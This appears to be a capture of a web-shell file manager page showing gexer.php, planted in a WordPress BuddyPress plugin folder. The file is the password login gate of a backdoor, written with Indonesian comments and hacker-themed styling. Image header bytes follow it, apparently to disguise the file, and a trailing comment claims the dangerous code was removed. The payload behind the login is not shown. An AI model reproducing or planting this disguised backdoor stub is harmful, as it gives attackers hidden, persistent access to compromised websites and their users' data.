Root Zanli
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
home
/
o5t6x7pgljbm
/
public_html
/
wp-content
/
plugins
/
buddypress
/
Filename :
gexer.php
back
Copy
<?php session_start(); $ewean = 'xxx'; // Ganti ini dengan password lo if (!isset($_SESSION['authenticated'])) { if (isset($_POST['password'])) { if ($_POST['password'] === $ewean) { $_SESSION['authenticated'] = true; } else { echo "<p style='color:red; text-align:center;'>Password salah!</p>"; } } if (!isset($_SESSION['authenticated'])) { echo ' <style> body { margin: 0; height: 100vh; overflow: hidden; font-family: "Courier New", monospace; color: #0f0; } .background { position: fixed; top: 0; left: 0; width: 100%; height: 100%; z-index: -1; background: black url("https://i.gifer.com/7VE.gif") center center / cover no-repeat; opacity: 0.2; } .form-container { display: flex; justify-content: center; align-items: center; height: 100vh; } form { border: 2px solid #0f0; padding: 20px; box-shadow: 0 0 20px #0f0; background: rgba(0, 0, 0, 0.8); border-radius: 10px; z-index: 1; } input[type="password"], input[type="submit"] { display: block; width: 100%; margin-top: 10px; padding: 10px; background: black; border: 1px solid #0f0; color: #0f0; font-size: 16px; box-shadow: 0 0 10px #0f0; border-radius: 5px; } input[type="submit"]:hover { cursor: pointer; background: #0f0; color: #000; } </style> <div class="background"></div> <div class="form-container"> <form method="post"> <label>Password:</label> <input type="password" name="password"> <input type="submit" value="Login"> </form> </div>'; exit; } } ?> RIFF¤ WEBPVP8 ˜ ðÑ *ôô>‘HŸK¥¤"§£±¨àð <?php /** * Note: This file may contain artifacts of previous malicious infection. * However, the dangerous code has been removed, and the file is now safe to use. */ ?>